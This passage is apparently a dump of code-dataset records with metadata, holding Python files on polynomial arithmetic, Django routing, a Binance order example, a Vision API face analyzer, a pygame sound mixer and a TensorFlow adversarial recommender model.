"django.http.HttpResponse", "line_number": 40, "usage_type": "call"}, {"api_name": "json.dumps", "line_number": 41, "usage_type": "call"}, {"api_name": "django.http.Http404", "line_number": 45, "usage_type": "name"}, {"api_name": "discusion.models.Respuestas", "line_number": 52, "usage_type": "call"}]} +{"seq_id": "191527131", "text": "from typing import Union\nimport numpy as np\nfrom numpy.polynomial.polynomial import Polynomial as Poly\nfrom lab01.circle import InverseMod\n\n\ndef rev(p: Poly, n: int) -> Poly:\n p = p.trim()\n result = p.coef[::-1]\n if len(p.coef) < n:\n result = np.concatenate([np.zeros(n - len(p.coef)), result])\n return Poly(result)\n\n\ndef PolyInverseModOverQ(f: Poly, mod_deg: int) -> Union[Poly, None]:\n if mod_deg < 1:\n raise ValueError('Не 
допустимое значение модуля')\n if f.coef[0] == 0:\n return None\n\n g = Poly([1 / f.coef[0]])\n r = int(np.ceil(np.log2(mod_deg)))\n d = 2\n for i in range(r):\n g = (2 * g - f * g ** 2).truncate(d)\n d <<= 1\n return g\n\n\ndef PolyInverseModOverZn(f: Poly, mod_deg: int, mod_ring: int) -> Union[Poly, None]:\n if mod_deg < 1 or mod_ring < 1:\n raise ValueError('Модуль не может быть меньше 1')\n\n if f.coef[0] == 0 or mod_ring == 1:\n return None\n\n f = Poly(np.mod(f.coef, mod_ring))\n\n c = InverseMod(f.coef[0], mod_ring)\n if c is None:\n return None\n\n g = Poly([c])\n r = int(np.ceil(np.log2(mod_deg)))\n d = 2\n\n for i in range(r):\n g = (2 * g - f * g ** 2).truncate(d)\n g = Poly(np.mod(g.coef, mod_ring))\n d <<= 1\n return g\n\n\ndef PolyDivModOverQ(a: Poly, b: Poly) -> (Poly, Poly):\n if not b.coef.any():\n raise ZeroDivisionError\n\n a = a.trim()\n b = b.trim()\n n, m = len(a.coef), len(b.coef)\n\n if n < m:\n return Poly([0]), a\n else:\n f = rev(b, m)\n g = PolyInverseModOverQ(f, n - m + 1)\n q = (rev(a, n) * g).truncate(n - m + 1)\n q = rev(q, n - m + 1)\n\n if len(q.coef) < n - m + 1:\n q.coef = np.concatenate([np.zeros(n - len(q)), q.coef])\n\n r = a - b * q\n r = r.trim()\n q = r.trim()\n return q, r\n\n\ndef PolyDivModOverZn(a: Poly, b: Poly, mod_r: int) -> (Poly, Poly):\n if mod_r < 1:\n raise ValueError\n\n if mod_r == 1:\n raise ZeroDivisionError\n\n a = Poly(np.mod(a.coef, mod_r))\n b = Poly(np.mod(b.coef, mod_r))\n\n a = a.trim()\n b = b.trim()\n n, m = len(a.coef), len(b.coef)\n\n if n < m:\n return Poly([0]), a\n else:\n f = rev(b, m)\n g = PolyInverseModOverZn(f, n - m + 1, mod_r)\n\n if g is None:\n raise ZeroDivisionError\n\n q = (rev(a, n) * g).truncate(n - m + 1)\n q = Poly(np.mod(q.coef, mod_r))\n q = rev(q, n - m)\n\n if len(q.coef) < n - m + 1:\n q.coef = np.concatenate([np.zeros(n - m + 1 - len(q)), q.coef])\n\n bq = Poly(np.mod((b * q).coef, mod_r))\n r = a - bq\n r = Poly(np.mod(r.coef, mod_r))\n q = Poly(np.mod(q.coef, mod_r))\n r = r.trim()\n q = q.trim()\n return q, r\n", "sub_path": "lab04/lab04.py", "file_name": "lab04.py", "file_ext": "py", "file_size_in_byte": 2831, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "32", "api": [{"api_name": "numpy.polynomial.polynomial.Polynomial", "line_number": 7, "usage_type": "name"}, {"api_name": "numpy.concatenate", "line_number": 11, "usage_type": "call"}, {"api_name": "numpy.zeros", "line_number": 11, "usage_type": "call"}, {"api_name": "numpy.polynomial.polynomial.Polynomial", "line_number": 12, "usage_type": "call"}, {"api_name": "numpy.polynomial.polynomial.Polynomial", "line_number": 15, "usage_type": "name"}, {"api_name": "numpy.polynomial.polynomial.Polynomial", "line_number": 21, "usage_type": "call"}, {"api_name": "numpy.ceil", "line_number": 22, "usage_type": "call"}, {"api_name": "numpy.log2", "line_number": 22, "usage_type": "call"}, {"api_name": "typing.Union", "line_number": 15, "usage_type": "name"}, {"api_name": "numpy.polynomial.polynomial.Polynomial", "line_number": 30, "usage_type": "name"}, {"api_name": "numpy.polynomial.polynomial.Polynomial", "line_number": 37, "usage_type": "call"}, {"api_name": "numpy.mod", "line_number": 37, "usage_type": "call"}, {"api_name": "lab01.circle.InverseMod", "line_number": 39, "usage_type": "call"}, {"api_name": "numpy.polynomial.polynomial.Polynomial", "line_number": 43, "usage_type": "call"}, {"api_name": "numpy.ceil", "line_number": 44, "usage_type": "call"}, {"api_name": "numpy.log2", "line_number": 44, 
"usage_type": "call"}, {"api_name": "numpy.polynomial.polynomial.Polynomial", "line_number": 49, "usage_type": "call"}, {"api_name": "numpy.mod", "line_number": 49, "usage_type": "call"}, {"api_name": "typing.Union", "line_number": 30, "usage_type": "name"}, {"api_name": "numpy.polynomial.polynomial.Polynomial", "line_number": 54, "usage_type": "name"}, {"api_name": "numpy.polynomial.polynomial.Polynomial", "line_number": 63, "usage_type": "call"}, {"api_name": "numpy.concatenate", "line_number": 71, "usage_type": "call"}, {"api_name": "numpy.zeros", "line_number": 71, "usage_type": "call"}, {"api_name": "numpy.polynomial.polynomial.Polynomial", "line_number": 79, "usage_type": "name"}, {"api_name": "numpy.polynomial.polynomial.Polynomial", "line_number": 86, "usage_type": "call"}, {"api_name": "numpy.mod", "line_number": 86, "usage_type": "call"}, {"api_name": "numpy.polynomial.polynomial.Polynomial", "line_number": 87, "usage_type": "call"}, {"api_name": "numpy.mod", "line_number": 87, "usage_type": "call"}, {"api_name": "numpy.polynomial.polynomial.Polynomial", "line_number": 94, "usage_type": "call"}, {"api_name": "numpy.polynomial.polynomial.Polynomial", "line_number": 103, "usage_type": "call"}, {"api_name": "numpy.mod", "line_number": 103, "usage_type": "call"}, {"api_name": "numpy.concatenate", "line_number": 107, "usage_type": "call"}, {"api_name": "numpy.zeros", "line_number": 107, "usage_type": "call"}, {"api_name": "numpy.polynomial.polynomial.Polynomial", "line_number": 109, "usage_type": "call"}, {"api_name": "numpy.mod", "line_number": 109, "usage_type": "call"}, {"api_name": "numpy.polynomial.polynomial.Polynomial", "line_number": 111, "usage_type": "call"}, {"api_name": "numpy.mod", "line_number": 111, "usage_type": "call"}, {"api_name": "numpy.polynomial.polynomial.Polynomial", "line_number": 112, "usage_type": "call"}, {"api_name": "numpy.mod", "line_number": 112, "usage_type": "call"}]} +{"seq_id": "294585102", "text": "'''\nCreated on 16.08.2012\n\n@author: apollov\n'''\nfrom django.conf.urls import patterns, url\n\nfrom views import (retailer_list, russia_partners, world_partners, \n stores_map, supermarkets_map, units_map, export_excel,\n recommendations)\n\n\nclass PartnersSite(object):\n def __init__(self, name='partners', app_name='partners'):\n self.name = name\n self.app_name = app_name\n\n def get_urls(self):\n urlpatterns = patterns('',\n #url(r'^retailer/$', retailer_list, name='retailer_list'),\n url(r'^supermarkets/$', supermarkets_map),\n url(r'^stores/$', stores_map),\n url(r'^units/$', units_map),\n url(r'^russia/$', russia_partners, name='russia_partners'),\n url(r'^world/$', world_partners, name='world_partners'),\n url(r'^export_excel/$', export_excel),\n url(r'^recommendations/$', recommendations),\n )\n\n return urlpatterns\n\n @property\n def urls(self):\n return self.get_urls(), self.app_name, self.name\n\nsite = PartnersSite()\n", "sub_path": "apps/partners/sites.py", "file_name": "sites.py", "file_ext": "py", "file_size_in_byte": 1092, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "32", "api": [{"api_name": "django.conf.urls.patterns", "line_number": 19, "usage_type": "call"}, {"api_name": "django.conf.urls.url", "line_number": 21, "usage_type": "call"}, {"api_name": "views.supermarkets_map", "line_number": 21, "usage_type": "argument"}, {"api_name": "django.conf.urls.url", "line_number": 22, "usage_type": "call"}, {"api_name": "views.stores_map", "line_number": 22, "usage_type": "argument"}, 
{"api_name": "django.conf.urls.url", "line_number": 23, "usage_type": "call"}, {"api_name": "views.units_map", "line_number": 23, "usage_type": "argument"}, {"api_name": "django.conf.urls.url", "line_number": 24, "usage_type": "call"}, {"api_name": "views.russia_partners", "line_number": 24, "usage_type": "argument"}, {"api_name": "django.conf.urls.url", "line_number": 25, "usage_type": "call"}, {"api_name": "views.world_partners", "line_number": 25, "usage_type": "argument"}, {"api_name": "django.conf.urls.url", "line_number": 26, "usage_type": "call"}, {"api_name": "views.export_excel", "line_number": 26, "usage_type": "argument"}, {"api_name": "django.conf.urls.url", "line_number": 27, "usage_type": "call"}, {"api_name": "views.recommendations", "line_number": 27, "usage_type": "argument"}]} +{"seq_id": "231488189", "text": "from binance.spot import Spot as REST\n\nclient = REST()\norder = {\n 'symbol': 'BTCUSDT',\n 'side': 'SELL',\n 'type': 'LIMIT',\n 'timeInForce': 'GTC',\n 'quantity': 0.002,\n 'price': 9500\n}\nresponse = client.new_order(**order)\nprint(response)\n", "sub_path": "examples/exchanges/binance_rest.py", "file_name": "binance_rest.py", "file_ext": "py", "file_size_in_byte": 253, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "32", "api": [{"api_name": "binance.spot.Spot", "line_number": 3, "usage_type": "call"}]} +{"seq_id": "536723311", "text": "# -*- coding: utf-8 -*-\n\nimport json\nimport gzip\n\nfilepath = \"../data/jawiki-country.json.gz\"\nwith gzip.open(filepath, 'rb') as f:\n for line in f:\n obj = json.loads(line.decode('utf-8'))\n if obj['title'] == 'イギリス':\n print(obj['text'])", "sub_path": "takahashi/chapter03/knock20.py", "file_name": "knock20.py", "file_ext": "py", "file_size_in_byte": 270, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "32", "api": [{"api_name": "gzip.open", "line_number": 7, "usage_type": "call"}, {"api_name": "json.loads", "line_number": 9, "usage_type": "call"}]} +{"seq_id": "651259843", "text": "import io\n\nfrom googleCVWrapper import GoogleCVWrapper\nfrom PIL import Image, ImageDraw\n\nclass ImageAnalyzer:\n\n def __init__(self, imagePath=\"\"):\n self.googleCV = GoogleCVWrapper()\n\n self.imagePath = imagePath\n\n self.maxNumberOfFaces = 100\n\n self.emotions = []\n if len(self.imagePath) > 0:\n with open(self.imagePath, 'rb') as image:\n self.faceAnnotations = self.googleCV.detect_face(image, self.maxNumberOfFaces)\n self.loadEmotions()\n\n\n def loadImage(self, imagePath):\n self.imagePath = imagePath\n self.emotions = []\n with open(self.imagePath, 'rb') as image:\n self.faceAnnotations = self.googleCV.detect_face(image, self.maxNumberOfFaces)\n\n def highlight_faces(self, image, faces, outputFilename):\n \"\"\"Draws a polygon around the faces, then saves to output_filename.\n\n Args:\n image: a file containing the image with the faces.\n faces: a list of faces found in the file. 
This should be in the format\n returned by the Vision API.\n output_filename: the name of the image file to be created, where the\n faces have polygons drawn around them.\n \"\"\"\n im = Image.open(image)\n draw = ImageDraw.Draw(im)\n\n for face in faces:\n box = [(vertex.x, vertex.y)\n for vertex in face.bounding_poly.vertices]\n draw.line(box + [box[0]], width=5, fill='#00ff00')\n\n im.save(outputFilename)\n\n def markFaces(self, image, outputFilename):\n image.seek(0)\n self.highlight_faces(image, self.faceAnnotations, outputFilename)\n\n\n def totalNumberOfPeopleInImage(self):\n return len(self.faceAnnotations)\n\n def isFaceLookingAtCamera(self, rollAngle, panAngle, tiltAngle):\n if rollAngle >= -30 and rollAngle <= 30 and panAngle >= -30 and panAngle <= 30:\n return True\n\n return False\n \n def numberOfPeopleLookingAtCamera(self):\n \n count = 0\n\n for annotation in self.faceAnnotations:\n rollAngle = annotation.rollAngle\n panAngle = annotation.panAngle\n tiltAngle = annotation.tiltAngle\n\n if self.isFaceLookingAtCamera(rollAngle, panAngle, tiltAngle):\n count += 1\n\n return count\n\n def loadEmotions(self):\n \n \"\"\"\n This function uses self.faceAnnotations to determine emotions,\n a list of tuples of the form (joy, sorrow, anger, surprise),\n expressing each emotions likelihood for each face\n \"\"\"\n\n emotions = []\n\n for annotation in self.faceAnnotations:\n joy = annotation.joy_likelihood\n sorrow = annotation.sorrow_likelihood\n anger = annotation.anger_likelihood\n surprise = annotation.surprise_likelihood\n\n emotions.append((joy, sorrow, anger, surprise))\n\n self.emotions = emotions \n \n\n def numberOfJoyfulPeople(self):\n count = 0\n for emotionTuple in self.emotions:\n if emotionTuple[0] > 3:\n count += 1\n return count\n\n def numberOfSorrowfulPeople(self):\n count = 0\n for emotionTuple in self.emotions:\n if emotionTuple[1] > 3:\n count += 1\n return count\n\n def numberOfAngryPeople(self):\n count = 0\n for emotionTuple in self.emotions:\n if emotionTuple[2] > 3:\n count += 1\n return count\n\n def numberOfSurprisedPeople(self):\n count = 0\n for emotionTuple in self.emotions:\n if emotionTuple[3] > 3:\n count += 1\n return count\n\n\n def numberOfEmotionallyActivePeople(self):\n for face in self.emotions:\n joy = face[0]\n sorrow = face[1]\n anger = face[2]\n surprise = face[3]\n\n return self.numberOfJoyfulPeople() + self.numberOfSorrowfulPeople() + self.numberOfSurprisedPeople() + self.numberOfAngryPeople()\n\n", "sub_path": "ImageAnalyzer.py", "file_name": "ImageAnalyzer.py", "file_ext": "py", "file_size_in_byte": 4044, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "32", "api": [{"api_name": "googleCVWrapper.GoogleCVWrapper", "line_number": 9, "usage_type": "call"}, {"api_name": "PIL.Image.open", "line_number": 38, "usage_type": "call"}, {"api_name": "PIL.Image", "line_number": 38, "usage_type": "name"}, {"api_name": "PIL.ImageDraw.Draw", "line_number": 39, "usage_type": "call"}, {"api_name": "PIL.ImageDraw", "line_number": 39, "usage_type": "name"}]} +{"seq_id": "646175447", "text": "import pygame as pg\n\npg.mixer.init()\n\nclass Mezclador():\n def __init__(self):\n self.playList = [pg.mixer.music.load(\"./sonidos/rock1.ogg\"),\n pg.mixer.music.load(\"./sonidos/rock2.ogg\"),\n pg.mixer.music.load(\"./sonidos/rock3.ogg\")]\n self.musicMenu = pg.mixer.Sound(\"./sonidos/menu.ogg\")\n self.musicHistoria = pg.mixer.Sound(\"./sonidos/historia.ogg\")\n self.sonidoClick = 
pg.mixer.Sound('./sonidos/Click.ogg')\n self.grunt = pg.mixer.Sound('./sonidos/grunt.ogg')\n self.flagMenu = True\n self.flagMudo = False\n self.flagHistoria = True\n self.conPlayList = 0\n\n def update(self,estados):\n self.menu(estados)\n self.historia(estados)\n self.musica(estados)\n\n def menu(self,estados):\n if self.flagMudo:\n self.musicMenu.stop()\n self.flagMenu = True\n elif estados[\"inicio\"] and not self.flagMudo and self.flagMenu:\n self.musicMenu.play(-1)\n self.flagMenu = False\n elif not estados[\"inicio\"]:# and not self.flagMenu:\n self.musicMenu.stop()\n self.flagMenu = True\n\n def historia(self,estados):\n if self.flagMudo:\n self.musicHistoria.stop()\n self.flagHistoria = True\n elif estados[\"historia\"] and not self.flagMudo and self.flagHistoria:\n self.musicHistoria.play(-1)\n self.flagHistoria = False\n elif not estados[\"historia\"]:# and not self.flagMenu:\n self.musicHistoria.stop()\n self.flagHistoria = True\n\n def click(self):\n self.sonidoClick.play()\n\n def grunt(self):\n self.grunt.play()\n\n def musica(self,estados):\n if estados[\"nivel1\"] or estados[\"nivel2\"]:\n if not self.flagMudo:\n if pg.mixer.music.get_busy() == 0: #1 es sonando y 0 es sin sonido\n self.playList[self.nextSong()]\n pg.mixer.music.play()\n elif estados[\"inicio\"]:\n pg.mixer.music.stop()\n\n def nextSong(self):\n if self.conPlayList < len(self.playList):\n self.conPlayList += 1\n else:\n self.conPlayList = 0\n return (self.conPlayList - 1)\n\n def mudo(self):\n if not self.flagMudo:\n self.flagMudo = True\n print(\"apagado\")\n else:\n self.flagMudo = False\n print(\"encendido\")\n\n def getMudo(self):\n return self.flagMudo\n", "sub_path": "sonidos/sonidos.py", "file_name": "sonidos.py", "file_ext": "py", "file_size_in_byte": 2498, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "32", "api": [{"api_name": "pygame.mixer.init", "line_number": 3, "usage_type": "call"}, {"api_name": "pygame.mixer", "line_number": 3, "usage_type": "attribute"}, {"api_name": "pygame.mixer.music.load", "line_number": 7, "usage_type": "call"}, {"api_name": "pygame.mixer", "line_number": 7, "usage_type": "attribute"}, {"api_name": "pygame.mixer.music.load", "line_number": 8, "usage_type": "call"}, {"api_name": "pygame.mixer", "line_number": 8, "usage_type": "attribute"}, {"api_name": "pygame.mixer.music.load", "line_number": 9, "usage_type": "call"}, {"api_name": "pygame.mixer", "line_number": 9, "usage_type": "attribute"}, {"api_name": "pygame.mixer.Sound", "line_number": 10, "usage_type": "call"}, {"api_name": "pygame.mixer", "line_number": 10, "usage_type": "attribute"}, {"api_name": "pygame.mixer.Sound", "line_number": 11, "usage_type": "call"}, {"api_name": "pygame.mixer", "line_number": 11, "usage_type": "attribute"}, {"api_name": "pygame.mixer.Sound", "line_number": 12, "usage_type": "call"}, {"api_name": "pygame.mixer", "line_number": 12, "usage_type": "attribute"}, {"api_name": "pygame.mixer.Sound", "line_number": 13, "usage_type": "call"}, {"api_name": "pygame.mixer", "line_number": 13, "usage_type": "attribute"}, {"api_name": "pygame.mixer.music.get_busy", "line_number": 55, "usage_type": "call"}, {"api_name": "pygame.mixer", "line_number": 55, "usage_type": "attribute"}, {"api_name": "pygame.mixer.music.play", "line_number": 57, "usage_type": "call"}, {"api_name": "pygame.mixer", "line_number": 57, "usage_type": "attribute"}, {"api_name": "pygame.mixer.music.stop", "line_number": 59, "usage_type": "call"}, {"api_name": "pygame.mixer", 
"line_number": 59, "usage_type": "attribute"}]} +{"seq_id": "485424395", "text": "\"\"\"\nPaper: Adversarial Personalized Ranking for Recommendation\nAuthor: Xiangnan He, Zhankui He, Xiaoyu Du and Tat-Seng Chua\nReference: https://github.com/hexiangnan/adversarial_personalized_ranking\n\"\"\"\n\nfrom model.base import AbstractRecommender\nimport tensorflow as tf\nimport numpy as np\nfrom utils.tools import csr_to_user_dict, csr_to_pairwise\nfrom utils import DataIterator\nfrom utils.tools import timer\nfrom modules import inner_product, log_loss\nfrom tensorflow.python.keras.layers import Embedding\n\n\n# prediction model\nclass APR(AbstractRecommender):\n def __init__(self, config):\n super(APR, self).__init__(config)\n train_matrix = self.dataset.train_matrix\n self.num_users, self.num_items = train_matrix.shape\n\n self.embedding_size = config[\"embed_size\"]\n self.learning_rate = config[\"lr\"]\n self.batch_size = config[\"batch_size\"]\n self.reg = config[\"reg\"]\n self.dns = config[\"dns\"]\n self.adv = config[\"adv\"]\n self.eps = config[\"eps\"]\n self.adv_epoch = config[\"adv_epoch\"]\n self.reg_adv = config[\"reg_adv\"]\n self.epochs = config[\"epochs\"]\n self.train_matrix = train_matrix\n\n self.user_pos_train = csr_to_user_dict(train_matrix)\n\n self.all_items = np.arange(self.num_items)\n self.build_model()\n self.sess.run(tf.global_variables_initializer())\n\n def _create_placeholders(self):\n with tf.name_scope(\"input_data\"):\n self.user_input = tf.placeholder(tf.int32, shape=[None], name=\"user_input\")\n self.item_input_pos = tf.placeholder(tf.int32, shape=[None], name=\"item_input_pos\")\n self.item_input_neg = tf.placeholder(tf.int32, shape=[None, None], name=\"item_input_neg\")\n self.steps = tf.placeholder(tf.int32, name=\"epoch\")\n steps = tf.cast(self.steps, dtype=tf.float32)\n self.growth = 2 * tf.sigmoid(steps / 10.0) - 1 # increase the adversarial perturbations gradually\n\n def _create_variables(self):\n with tf.name_scope(\"embedding\"):\n regularizer = tf.keras.regularizers.l2(self.reg)\n # embedding layers\n emb_P_init = tf.keras.initializers.truncated_normal(mean=0.0, stddev=0.01)\n self.emb_P_layer = Embedding(self.num_users, self.embedding_size,\n embeddings_initializer=emb_P_init,\n embeddings_regularizer=regularizer)\n\n emb_Q_init = tf.keras.initializers.truncated_normal(mean=0.0, stddev=0.01)\n self.emb_Q_layer = Embedding(self.num_items, self.embedding_size,\n embeddings_initializer=emb_Q_init,\n embeddings_regularizer=regularizer)\n\n self.delta_P_layer = Embedding(self.num_users, self.embedding_size,\n embeddings_initializer=tf.keras.initializers.zeros(),\n trainable=False)\n\n self.delta_Q_layer = Embedding(self.num_items, self.embedding_size,\n embeddings_initializer=tf.keras.initializers.zeros(),\n trainable=False)\n\n def _create_loss(self):\n with tf.name_scope(\"loss\"):\n # loss for L(Theta)\n # get embedding\n embedding_p = self.emb_P_layer(self.user_input) # (b, embedding_size)\n embedding_q_pos = self.emb_Q_layer(self.item_input_pos) # (b, embedding_size)\n embedding_q_neg = self.emb_Q_layer(self.item_input_neg) # (b, ?, embedding_size)\n\n output_pos = inner_product(embedding_p, embedding_q_pos) # (b,)\n embedding_p_tmp = tf.expand_dims(embedding_p, axis=1) # (b, 1, embedding_size)\n outputs_neg = inner_product(embedding_p_tmp, embedding_q_neg) # (b, ?)\n output_neg = tf.reduce_max(outputs_neg, axis=-1) # (b,)\n\n # bpr loss\n yij = tf.clip_by_value(output_pos - output_neg, -80.0, 1e8)\n self.bpr_loss = 
tf.reduce_sum(log_loss(yij))\n\n # loss for L(Theta + adv_Delta)\n # Note that the number of negative item is 1 while adversarial training.\n delta_p = self.delta_P_layer(self.user_input) # (b, embedding_size)\n delta_q_pos = self.delta_Q_layer(self.item_input_pos) # (b, embedding_size)\n delta_q_neg = tf.squeeze(self.delta_Q_layer(self.item_input_neg)) # (b, embedding_size)\n # perturbed embedding\n p_plus_delta = embedding_p + delta_p\n pos_q_plus_delta = embedding_q_pos + delta_q_pos\n neg_q_plus_delta = tf.squeeze(embedding_q_neg) + delta_q_neg\n # perturbed predict\n adv_output_pos = inner_product(p_plus_delta, pos_q_plus_delta)\n adv_output_neg = inner_product(p_plus_delta, neg_q_plus_delta)\n\n # adversarial loss\n adv_yij = tf.clip_by_value(adv_output_pos - adv_output_neg, -80.0, 1e8)\n adv_loss = tf.reduce_sum(log_loss(adv_yij))\n self.amf_loss = self.bpr_loss + self.growth * self.reg_adv * adv_loss\n\n self.embedding_P = self.emb_P_layer.weights[0]\n self.embedding_Q = self.emb_Q_layer.weights[0]\n self.delta_P = self.delta_P_layer.weights[0]\n self.delta_Q = self.delta_Q_layer.weights[0]\n\n def _create_adversarial(self):\n with tf.name_scope(\"adversarial\"):\n # generate the adversarial weights by random method\n if self.adv == \"random\":\n # generation\n self.adv_P = tf.truncated_normal(shape=[self.num_users, self.embedding_size], mean=0.0, stddev=0.01)\n self.adv_Q = tf.truncated_normal(shape=[self.num_items, self.embedding_size], mean=0.0, stddev=0.01)\n\n # normalization and multiply epsilon\n self.update_P = self.delta_P.assign(tf.nn.l2_normalize(self.adv_P, 1) * self.eps * self.growth)\n self.update_Q = self.delta_Q.assign(tf.nn.l2_normalize(self.adv_Q, 1) * self.eps * self.growth)\n\n # generate the adversarial weights by gradient-based method\n elif self.adv == \"grad\":\n # return the IndexedSlice Data: [(values, indices, dense_shape)]\n # grad_var_P: [grad,var], grad_var_Q: [grad, var]\n self.grad_P, self.grad_Q = tf.gradients(self.bpr_loss, [self.embedding_P, self.embedding_Q])\n\n # convert the IndexedSlice Data to Dense Tensor\n self.grad_P_dense = tf.stop_gradient(self.grad_P)\n self.grad_Q_dense = tf.stop_gradient(self.grad_Q)\n\n # normalization: new_grad = (grad / |grad|) * eps\n self.update_P = self.delta_P.assign(tf.nn.l2_normalize(self.grad_P_dense, 1) * self.eps * self.growth)\n self.update_Q = self.delta_Q.assign(tf.nn.l2_normalize(self.grad_Q_dense, 1) * self.eps * self.growth)\n\n def _create_optimizer(self):\n with tf.name_scope(\"optimizer\"):\n self.bpr_optimizer = tf.train.AdagradOptimizer(learning_rate=self.learning_rate).minimize(self.bpr_loss)\n self.amf_optimizer = tf.train.AdagradOptimizer(learning_rate=self.learning_rate).minimize(self.amf_loss)\n\n def build_model(self):\n self._create_placeholders()\n self._create_variables()\n self._create_loss()\n self._create_optimizer()\n self._create_adversarial()\n\n def train_model(self):\n self._pre_training()\n self._adversarial_training()\n\n def _pre_training(self):\n # pretrain\n self.logger.info(\"Pre-training\")\n for epoch in range(self.adv_epoch):\n users, pos_items, neg_items = csr_to_pairwise(self.train_matrix, neg_num=self.dns, fold_neg=True)\n data = DataIterator(users, pos_items, neg_items, batch_size=self.batch_size, shuffle=True)\n for user_input, item_input_pos, item_dns_list in data:\n feed_dict = {self.user_input: user_input,\n self.item_input_pos: item_input_pos,\n self.item_input_neg: item_dns_list}\n self.sess.run(self.bpr_optimizer, feed_dict)\n\n result = 
self.evaluate_model()\n self.logger.info(\"%d:\\t%s\" % (epoch, result))\n\n def _adversarial_training(self):\n # adversarial training\n self.logger.info(\"Adversarial training\")\n for epoch in range(self.adv_epoch, self.epochs):\n users, pos_items, neg_items = csr_to_pairwise(self.train_matrix, neg_num=1, fold_neg=True)\n data = DataIterator(users, pos_items, neg_items, batch_size=self.batch_size, shuffle=True)\n for user_input, item_input_pos, item_input_neg in data:\n feed_dict = {self.user_input: user_input,\n self.item_input_pos: item_input_pos,\n self.item_input_neg: item_input_neg,\n self.steps: epoch}\n\n self.sess.run([self.update_P, self.update_Q], feed_dict)\n self.sess.run(self.amf_optimizer, feed_dict)\n\n result = self.evaluate_model()\n self.logger.info(\"%d:\\t%s\" % (epoch, result))\n\n def evaluate_model(self):\n self.user_embedding_eval, self.item_embedding_eval = self.sess.run([self.embedding_P, self.embedding_Q])\n result = self.evaluator.evaluate(self)\n buf = '\\t'.join([str(x) for x in result])\n return buf\n\n def predict_for_eval(self, users):\n user_embedding = self.user_embedding_eval[users]\n item_embedding = self.item_embedding_eval\n ratings = np.matmul(user_embedding, item_embedding.T)\n return ratings\n", "sub_path": "model/APR.py", "file_name": "APR.py", "file_ext": "py", "file_size_in_byte": 9779, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "32", "api": [{"api_name": "model.base.AbstractRecommender", "line_number": 18, "usage_type": "name"}, {"api_name": "utils.tools.csr_to_user_dict", "line_number": 36, "usage_type": "call"}, {"api_name": "numpy.arange", "line_number": 38, "usage_type": "call"}, {"api_name": "tensorflow.global_variables_initializer", "line_number": 40, "usage_type": "call"}, {"api_name": "tensorflow.name_scope", "line_number": 43, "usage_type": "call"}, {"api_name": "tensorflow.placeholder", "line_number": 44, "usage_type": "call"}, {"api_name": "tensorflow.int32", "line_number": 44, "usage_type": "attribute"}, {"api_name": "tensorflow.placeholder", "line_number": 45, "usage_type": "call"}, {"api_name": "tensorflow.int32", "line_number": 45, "usage_type": "attribute"}, {"api_name": "tensorflow.placeholder", "line_number": 46, "usage_type": "call"}, {"api_name": "tensorflow.int32", "line_number": 46, "usage_type": "attribute"}, {"api_name": "tensorflow.placeholder", "line_number": 47, "usage_type": "call"}, {"api_name": "tensorflow.int32", "line_number": 47, "usage_type": "attribute"}, {"api_name": "tensorflow.cast", "line_number": 48, "usage_type": "call"}, {"api_name": "tensorflow.float32", "line_number": 48, "usage_type": "attribute"}, {"api_name": "tensorflow.sigmoid", "line_number": 49, "usage_type": "call"}, {"api_name": "tensorflow.name_scope", "line_number": 52, "usage_type": "call"}, {"api_name": "tensorflow.keras.regularizers.l2", "line_number": 53, "usage_type": "call"}, {"api_name": "tensorflow.keras", "line_number": 53, "usage_type": "attribute"}, {"api_name": "tensorflow.keras.initializers.truncated_normal", "line_number": 55, "usage_type": "call"}, {"api_name": "tensorflow.keras", "line_number": 55, "usage_type": "attribute"}, {"api_name": "tensorflow.python.keras.layers.Embedding", "line_number": 56, "usage_type": "call"}, {"api_name": "tensorflow.keras.initializers.truncated_normal", "line_number": 60, "usage_type": "call"}, {"api_name": "tensorflow.keras", "line_number": 60, "usage_type": "attribute"}, {"api_name": "tensorflow.python.keras.layers.Embedding", 
"line_number": 61, "usage_type": "call"}, {"api_name": "tensorflow.python.keras.layers.Embedding", "line_number": 65, "usage_type": "call"}, {"api_name": "tensorflow.keras.initializers.zeros", "line_number": 66, "usage_type": "call"}, {"api_name": "tensorflow.keras", "line_number": 66, "usage_type": "attribute"}, {"api_name": "tensorflow.python.keras.layers.Embedding", "line_number": 69, "usage_type": "call"}, {"api_name": "tensorflow.keras.initializers.zeros", "line_number": 70, "usage_type": "call"}, {"api_name": "tensorflow.keras", "line_number": 70, "usage_type": "attribute"}, {"api_name": "tensorflow.name_scope", "line_number": 74, "usage_type": "call"}, {"api_name": "modules.inner_product", "line_number": 81, "usage_type": "call"}, {"api_name": "tensorflow.expand_dims", "line_number": 82, "usage_type": "call"}, {"api_name": "modules.inner_product", "line_number": 83, "usage_type": "call"}, {"api_name": "tensorflow.reduce_max", "line_number": 84, "usage_type": "call"}, {"api_name": "tensorflow.clip_by_value", "line_number": 87, "usage_type": "call"}, {"api_name": "tensorflow.reduce_sum", "line_number": 88, "usage_type": "call"}, {"api_name": "modules.log_loss", "line_number": 88, "usage_type": "call"}, {"api_name": "tensorflow.squeeze", "line_number": 94, "usage_type": "call"}, {"api_name": "tensorflow.squeeze", "line_number": 98, "usage_type": "call"}, {"api_name": "modules.inner_product", "line_number": 100, "usage_type": "call"}, {"api_name": "modules.inner_product", "line_number": 101, "usage_type": "call"}, {"api_name": "tensorflow.clip_by_value", "line_number": 104, "usage_type": "call"}, {"api_name": "tensorflow.reduce_sum", "line_number": 105, "usage_type": "call"}, {"api_name": "modules.log_loss", "line_number": 105, "usage_type": "call"}, {"api_name": "tensorflow.name_scope", "line_number": 114, "usage_type": "call"}, {"api_name": "tensorflow.truncated_normal", "line_number": 118, "usage_type": "call"}, {"api_name": "tensorflow.truncated_normal", "line_number": 119, "usage_type": "call"}, {"api_name": "tensorflow.nn.l2_normalize", "line_number": 122, "usage_type": "call"}, {"api_name": "tensorflow.nn", "line_number": 122, "usage_type": "attribute"}, {"api_name": "tensorflow.nn.l2_normalize", "line_number": 123, "usage_type": "call"}, 